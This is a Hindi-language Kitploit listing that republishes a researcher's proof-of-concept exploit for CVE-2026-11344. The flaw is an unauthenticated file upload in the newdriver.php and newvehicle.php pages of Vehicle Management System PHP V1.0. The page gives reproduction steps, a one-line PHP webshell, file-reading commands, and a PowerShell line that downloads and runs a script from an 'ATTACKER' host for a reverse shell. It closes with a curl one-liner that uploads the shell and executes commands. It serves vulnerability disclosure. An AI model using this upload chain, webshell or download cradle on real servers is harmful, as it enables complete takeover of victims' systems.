Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-11344-RCE — प्रमाण-अवधारणा शोषण (PoC) वाहन प्रबंधन प्रणाली PHP V1.0 में असीमित फ़ाइल अपलोड के माध्यम से अप्रमाणित दूरस्थ कोड निष्पादन के लिए। इसमें विस्तृत पुनरुत्पादन चरण, curl PoC, और PHP वेबशेल पेलोड शामिल है। | Kitploit
उपकरण/GitHubGitHub/xmyronn/cve-2026-11344-rce
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubxmyronn/cve-2026-11344-rce

CVE-2026-11344-RCE

प्रमाण-अवधारणा शोषण (PoC) वाहन प्रबंधन प्रणाली PHP V1.0 में असीमित फ़ाइल अपलोड के माध्यम से अप्रमाणित दूरस्थ कोड निष्पादन के लिए। इसमें विस्तृत पुनरुत्पादन चरण, curl PoC, और PHP वेबशेल पेलोड शामिल है।

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

वाहन प्रबंधन प्रणाली PHP में - newdriver.php में फ़ाइल अपलोड के माध्यम से अप्रमाणित रिमोट कोड निष्पादन

भेद्यता जानकारी

क्षेत्रविवरण
उत्पादवाहन प्रबंधन प्रणाली PHP में
विक्रेताcode-projects.org
संस्करणV1.0
भेद्यता प्रकारअप्रतिबंधित फ़ाइल अपलोड जिससे रिमोट कोड निष्पादन होता है (CWE-434)
प्रभावित फ़ाइलेंnewdriver.php, newvehicle.php
पैरामीटरphoto (POST, multipart/form-data)
प्रमाणीकरण आवश्यकनहीं (अप्रमाणित)
CVSS स्कोर10.0 क्रिटिकल
हमला वेक्टरदूरस्थ / नेटवर्क
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता सहभागिताकोई नहीं

विवरण

code-projects.org द्वारा वाहन प्रबंधन प्रणाली PHP V1.0 newdriver.php (और समान रूप से newvehicle.php) में अप्रतिबंधित फ़ाइल अपलोड के माध्यम से अप्रमाणित रिमोट कोड निष्पादन के लिए संवेदनशील है।

एप्लिकेशन newdriver.php पर एक केवल-व्यवस्थापक "नया ड्राइवर" पंजीकरण फॉर्म प्रदर्शित करता है जिसमें एक फोटो अपलोड फ़ील्ड शामिल है। हालांकि, एंडपॉइंट कोई सत्र सत्यापन नहीं करता है — कोई भी अप्रमाणित हमलावर सीधे उस तक पहुँच सकता है बिना लॉगिन पर रीडायरेक्ट हुए। इसके अलावा, फोटो अपलोड फ़ील्ड PHP फ़ाइलों सहित किसी भी फ़ाइल प्रकार को स्वीकार करता है, जिसमें कोई एक्सटेंशन फ़िल्टरिंग, MIME प्रकार सत्यापन, या सामग्री निरीक्षण नहीं है।

एक हमलावर यह कर सकता है:

  1. सीधे newdriver.php पर बिना किसी सत्र या क्रेडेंशियल के जाएं
  2. PHP वेबशेल को "फोटो" के रूप में ड्राइवर फॉर्म सबमिट करें
  3. शेल /picture/ निर्देशिका में सहेजा जाता है
  4. अपलोड की गई शेल पर जाएं और सर्वर पर मनमाने OS कमांड निष्पादित करें

इसके परिणामस्वरूप वेब सर्वर प्रक्रिया के विशेषाधिकारों के साथ पूर्ण रिमोट कोड निष्पादन होता है।


भेद्यता श्रृंखला

root@kitploit:~
Unauthenticated HTTP Request
        ↓
newdriver.php (no session check)
        ↓
photo field accepts .php file (no file type validation)
        ↓
Shell saved to /picture/web_shell.php
        ↓
GET /picture/web_shell.php?cmd=whoami
        ↓
RCE — arbitrary OS command execution

पुनरुत्पादन के चरण

चरण 1 — newdriver.php तक अप्रमाणित पहुंच की पुष्टि करें

बिना सत्र वाला एक नया ब्राउज़र खोलें (गुप्त/निजी विंडो)। सीधे एंडपॉइंट पर जाएं:

root@kitploit:~
http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newdriver.php

नया ड्राइवर फॉर्म बिना किसी प्रमाणीकरण जांच और लॉगिन पर रीडायरेक्ट के सफलतापूर्वक लोड होता है।

स्क्रीनशॉट 2026-05-19 175610

चरण 2 — PHP वेबशेल तैयार करें

एक सरल PHP कमांड निष्पादन वेबशेल बनाएं:

root@kitploit:~
<?php system($_GET['cmd']); ?>

इसे shell.php (या कोई .php फ़ाइलनाम) के रूप में सहेजें।


चरण 3 — वेबशेल को फोटो के रूप में फॉर्म सबमिट करें

ड्राइवर फॉर्म फ़ील्ड को किसी भी मान से भरें और PHP वेबशेल को फोटो अपलोड के रूप में चुनें:

root@kitploit:~
ड्राइवर का नाम:        test
मोबाइल:             1234567890
ड्राइवर ज्वाइनिंग दिनांक: 2026-05-19
राष्ट्रीय आईडी:        test
लाइसेंस नंबर:         test
लाइसेंस समाप्ति दिनांक:   2026-05-30
ड्राइवर का पता:     test
फोटो:              shell.php   ← PHP वेबशेल यहाँ अपलोड की गई

सबमिट क्वेरी पर क्लिक करें।

स्क्रीनशॉट 2026-05-19 175622 स्क्रीनशॉट 2026-05-19 175708

चरण 4 — शेल अपलोड की पुष्टि

एप्लिकेशन "पंजीकरण पूर्ण!" के साथ प्रतिक्रिया करता है — यह पुष्टि करता है कि PHP शेल स्वीकार कर ली गई और बिना किसी सत्यापन के सहेज ली गई।

स्क्रीनशॉट 2026-05-19 175718

चरण 5 — अपलोड की गई शेल के माध्यम से मनमाने कमांड निष्पादित करें

/picture/ निर्देशिका में अपलोड की गई शेल पर जाएं और cmd पैरामीटर के माध्यम से OS कमांड पास करें:

root@kitploit:~
http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/picture/shell.php?cmd=whoami

सर्वर कमांड निष्पादित करता है और आउटपुट लौटाता है:

root@kitploit:~
desktop-g1i9np3\dell
स्क्रीनशॉट 2026-05-19 175759

चरण 6 — आगे के कमांड निष्पादन उदाहरण

root@kitploit:~
# Read sensitive files
http://TARGET/.../picture/shell.php?cmd=type+C:\xampp\htdocs\VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE\newdriver.php

# List web root
http://TARGET/.../picture/shell.php?cmd=dir+C:\xampp\htdocs\

# Full reverse shell via PowerShell
http://TARGET/.../picture/shell.php?cmd=powershell+-c+"IEX(New-Object+Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"

दूसरा प्रभावित एंडपॉइंट — newvehicle.php

newvehicle.php में समान भेद्यता मौजूद है। एक अप्रमाणित हमलावर वाहन फॉर्म (नया वाहन जोड़ें) तक पहुँच सकता है, वाहन फोटो फ़ील्ड के माध्यम से PHP वेबशेल अपलोड कर सकता है, और उसी विधि से RCE प्राप्त कर सकता है।

root@kitploit:~
http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newvehicle.php

दोनों एंडपॉइंट एक ही मूल कारण साझा करते हैं: कोई सत्र सत्यापन नहीं और कोई फ़ाइल अपलोड प्रतिबंध नहीं।


curl PoC (एक-लाइनर)

root@kitploit:~
curl -s -X POST \
  "http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newdriver.php" \
  -F "dname=test" \
  -F "mobile=1234567890" \
  -F "djoiningdate=2026-05-19" \
  -F "nid=test" \
  -F "licenseno=test" \
  -F "licenseenddate=2026-05-30" \
  -F "daddress=test" \
  -F "[email protected];type=image/jpeg" \
  && echo "[+] Shell uploaded" \
  && curl -s "http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/picture/shell.php?cmd=whoami"

प्रभाव

  • अप्रमाणित रिमोट कोड निष्पादन — नेटवर्क पर कोई भी अनाम हमलावर पूर्ण OS कमांड निष्पादन प्राप्त करता है
  • पूर्ण सर्वर से समझौता — सभी फ़ाइलों, क्रेडेंशियल्स, डेटाबेस कॉन्फ़िग तक पढ़ने/लिखने की पहुंच
  • कोई सहभागिता आवश्यक नहीं — एकल HTTP अनुरोध में पूरी तरह से स्वचालित शोषण
  • दो प्रभावित एंडपॉइंट — newdriver.php और newvehicle.php दोनों संवेदनशील

प्रभावित फ़ाइलें

फ़ाइलअपलोड फ़ील्डशेल भंडारण पथ
newdriver.phpphoto/picture/
newvehicle.phpphoto/picture/

विक्रेता जानकारी

  • विक्रेता होमपेज: https://code-projects.org/vehicle-management-system-in-php-with-source-code/
  • डाउनलोड: https://code-projects.org/vehicle-management-system-in-php-with-source-code/

खोजकर्ता

Syed Imad Uddin Alvi (imad alvi)
स्वतंत्र सुरक्षा शोधकर्ता

टूल डाउनलोड करें